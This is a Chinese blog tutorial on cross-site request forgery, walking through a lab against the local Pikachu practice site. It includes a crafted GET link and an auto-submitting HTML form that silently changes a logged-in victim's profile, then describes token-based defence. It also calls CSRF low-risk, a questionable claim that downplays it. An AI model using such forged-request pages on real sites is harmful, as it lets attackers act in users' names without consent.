CSRF详解

已于 2023-12-13 11:47:13 修改
阅读量529 收藏 6
点赞数 15
文章标签: 安全
于 2023-12-13 09:12:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73531061/article/details/134963253
版权

1.CSRF

1.1 概念

全称是Cross-Site Request Forgery,跨站请求伪造

黑客利用已经登录的用户,诱导其访问或登录早已构造好的恶意链接的页面。然后在用户毫不知情的情况下,以用户的名义完成非用户本意的操作

1.2 CSRF的攻击流程

1.3 CSRF的防御

从用户角度,登录一个重要的网站,操作完成后,一定先点击用户退出,然后再访问其它网站,避免遭受CSRF攻击。

2. CSRF漏洞利用的实验

2.1根据抓到的数据包,构造恶意的GET 请求:

因为是GET请求所以是HTTP协议,也要知道网站地址

http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18656565111&add=usa&email=lili%40pikachu.com&submit=submit

引诱lili这个用户去点击黑客构造的链接,(攻击成功的前提条件,lili在没有退出登录的情况下点击)

引诱lili这个用户去点击黑客构造的链接,(lili如果退出登录了,这个攻击就会失败!)

在同一个浏览器下攻击才能成功

2.2 根据抓到的数据包,构造恶意的POST 请求:

Post请求参数放在请求体中,恶意连接需要使用表单实现

<form action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="post">

        <input type="text" name="sex" value="boy">

        <input type="text" name="phonenum" value="15988767111">

        <input type="text" name="add" value="nba+lakes">

        <input type="text" name="email" value="lili@tedu.cn">

        <input type="submit" name="submit" value="submit" id="postsubmit">

</form>

<script>

        // 实现自动提交,含义是当窗口一加载时,实现自动点击表单提交按钮

        window.onload=function(){

                document.getElementById("postsubmit").click();

        }

</script>

在lili没有退出登录的情况下,引诱lili这个用户去访问构造的恶意的建造的.html文件,攻击成功!

在lili退出登录的情况下,引诱lili这个用户去访问构造的恶意的建造的.html文件,攻击失败!

从开发者角度出发,我们应该做到即使用户没有退出登录,我们一样可以防御CSRF攻击!

  1. 防御:

增加一个令牌 一个表示身份的随机的,一次性的字符串.不会存储在cookie中. 这是它与seesionid的区别.

由于csrf攻击的条件比较苛刻,所以它带来的风险是比较小的.这就是为什么普通企业的网站不在意该类型的漏洞.

对比XSS和CSRF?

xss-黑客能够拿到cookie吗?可以偷到cookie中的数据

csrf-黑客能够拿到cookie吗?不可以,只是对cookie中数据的利用

唔昂Wx
关注
  • 15
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS与CSRF详解
Sylon的博客
06-24 2775
XSS与CSRF详解 随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。 黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则...
详解XSS 和 CSRF简述及预防措施
10-17
主要介绍了XSS 和 CSRF简述及预防措施,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
【DVWA】CSRF详解
qq_43665434的博客
03-03 1199
【DVWA】CSRF 一、low级别 1、测试流程 如图,输入一次新密码和一次确认新密码就可更改密码,并没有索要旧密码进行验证。 用burp抓包看一下: 发现是get请求,而且并没有token,所以明显存在CSRF漏洞。 伪造一个请求链接: http://222.24.28.118/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 将password_new和passw
csrf详解
weixin_38245947的博客
06-14 649
来自:添加链接描述但是我们现实很多情况需要有状态,比如:登录态的身份信息,网页上的很多操作需要登录之后才能操作,比如:相册的上传照片和删除照片都需要登录之后才能操作。.怎么方便的让每次都请求都带上key,所以就设计了cookie。登录态key是浏览器默认自动携带的,key通常是会话cookie,只要浏览器不关闭,key一直存在。所以只要用户A曾经登录过相册网站(www.photo.com),浏览器没有关闭,用户在没有关闭的浏览器打开一个黑客网页(www.hacker.com),黑客网页发送http请求到相册
pikachu靶场练习——CSRF详解
qq_42176496的博客
09-05 2291
pikachu靶场——CSRF详解
CSRF 详解:攻击,防御,Spring Security应用等
pdai的博客
01-08 430
CSRF(Cross-site request forgery跨站请求伪造,也被称成为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 @pdai 开发安全 - CSRF 详解 CSRF 简介 CSRF 如何攻击 CSRF 理解的注意点 黑客能拿到Cookie吗? 什么样的请求是要CSRF保护的? 为什么对请求...
CSRF 攻击详解
只为成功找方法 不为失败找借口
05-22 931
禁用 CSRF 保护有其合理的应用场景,特别是在开发 RESTful API、使用其他防护措施、内部应用和非浏览器客户端时。然而,需要谨慎对待这个决定,并确保在适当的场景中启用 CSRF 保护,以防范潜在的安全风险。
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-14 1348
CSRF 攻击通过在用户不知情的情况下,冒充用户身份向服务器发送请求。由于攻击者可以利用用户在站点上已存在的 cookie 进行身份验证,所以这种攻击往往不易被察觉。它与常见的 XSS(跨站脚本攻击)攻击有相似之处,都是利用 Web 应用程序的安全漏洞进行攻击。CSRF常年位于CWE Top10,可见其危害性及普遍性。排名源自CWE官网Note:如果想了解CWE,请参阅「 网络安全常用术语解读 」通用缺陷枚举CWE详解
csrf详解
weixin_30478619的博客
09-01 53
CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。如下:其中Web A为存在...
XSS 和 CSRF 详解
cuomer的博客
07-14 3659
我们常说的网络安全其实应该包括以下三方面的安全:1、机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马。2、完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子,当然这是传说,常见的方式是XSS跨站脚本攻击和csrf跨站请求伪造。3、可用性,比如我们的网络服务是否可用,常用的攻击方式是dos和ddos,拒绝服务和分布式拒绝服务攻击。本文主要讲述xss和csrf的...
django的csrf实现过程详解
09-18
主要介绍了django的csrf实现过程相加,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Flask框架 CSRF 保护实现方法详解
09-18
主要介绍了Flask框架 CSRF 保护实现方法,结合实例形式详细分析了Flask-WTF针对CSRF攻击的防护相关操作技巧,需要的朋友可以参考下
详解Django的CSRF认证实现
09-20
主要介绍了详解Django的CSRF认证实现,详细的介绍了csrf原理和实现,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Django使用中间键实现csrf认证详解
01-01
Django中的csrf认证实现的原理 调用 process_view 方法 检查视图是否被 @csrf_exempt (免除csrf认证) – 去请求体或cookie中获取token 情况一(全站使用csrf认证,局部不想使用csrf认证) MIDDLEWARE = [ '...
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 492
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
物理隔离后数据怎么导入和导出?安全U盘一键解决
文件数据安全交换
06-13 338
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。可配置多种组合条件对不合规的文件进行阻断,只有符合安全标准的文件才能发送。由于是物理隔离,一般的数据交换工具无法使用,此时,常用的是物理手段,如U盘、光盘刻录等,但普遍的U盘、光盘是无法满足上述数据导入导出需求的,这就需要专业的安全U盘来解决。
安全函数】常用的安全函数的使用
weixin_54954007的博客
06-13 665
本文章描述常用的不安全函数与对应的安全函数的使用。不安全函数原型参考。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 563
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
php 模拟访问csrf,详解php curl带有csrf-token验证模拟提交方法
06-02
下面是详解php curl带有csrf-token验证模拟提交方法的步骤: 1.首先,获取CSRF-Token。通常情况下,网站会在登录时生成并存储一个CSRF-Token。可以通过curl模拟登录,并从响应中获取CSRF-Token。 2.使用curl发送...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值